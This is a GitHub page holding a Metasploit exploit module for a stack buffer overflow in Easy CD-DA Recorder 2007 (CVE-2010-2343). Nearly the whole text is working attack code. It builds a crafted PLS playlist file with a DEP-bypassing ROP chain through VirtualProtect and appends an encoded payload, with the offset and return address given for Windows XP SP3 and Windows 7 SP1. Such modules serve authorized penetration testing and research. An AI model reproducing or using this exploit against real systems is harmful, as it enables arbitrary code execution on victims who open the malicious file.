Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
Fetching contributors…

Cannot retrieve contributors at this time

122 lines (107 sloc) 3.844 kb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
Easy CD-DA Recorder 2007 caused by an overlong string in a playlist entry.
By persuading the victim to open a specially-crafted PLS file, a
remote attacker can execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on
Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'chap0', # Vulnerability discovery and original exploit
'Gabor Seljan', # Metasploit module
'juan vazquez' # Improved reliability
],
'References' =>
[
[ 'BID', '40631' ],
[ 'EDB', '13761' ],
[ 'OSVDB', '65256' ],
[ 'CVE', '2010-2343' ],
[ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process'
},
'Platform' => 'win',
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x0a\x3d",
'Space' => 2454,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # ADD ESP,-3500
},
'Targets' =>
[
[ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',
# easycdda.exe 3.0.114.0
# audconv.dll 7.0.815.0
{
'Offset' => 1108,
'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 7 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])
],
self.class)
end
def nops
return make_nops(4).unpack("V").first
end
def rop_nops(n = 1)
# RETN (ROP NOP) [audconv.dll]
[0x1003d55d].pack('V') * n
end
def exploit
# ROP chain generated by mona.py - See corelan.be
rop_gadgets =
[
0x1007261e, # POP EDX # RETN [audconv.dll]
0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe]
0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]
0x10035802, # XCHG EAX,ESI # RETN [audconv.dll]
0x1005d288, # POP EBP # RETN [audconv.dll]
0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]
0x1005cc2d, # POP EBX # RETN [audconv.dll]
0x00000996, # 0x00000996-> EBX
0x1008740c, # POP EDX # RETN [audconv.dll]
0x00000040, # 0x00000040-> EDX
0x1001826d, # POP ECX # RETN [audconv.dll]
0x004364c6, # &Writable location [easycdda.exe]
0x00404aa9, # POP EDI # RETN [easycdda.exe]
0x100378e6, # RETN (ROP NOP) [audconv.dll]
0x0042527d, # POP EAX # RETN [easycdda.exe]
nops,
0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
].flatten.pack('V*')
sploit = rop_nops(target['Offset'] / 4)
sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
sploit << [target.ret].pack("V")
sploit << rop_nops(22)
sploit << rop_gadgets
sploit << payload.encoded
sploit << rand_text_alpha_upper(10000) # Generate exception
# Create the file
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end
Jump to Line
Something went wrong with that request. Please try again.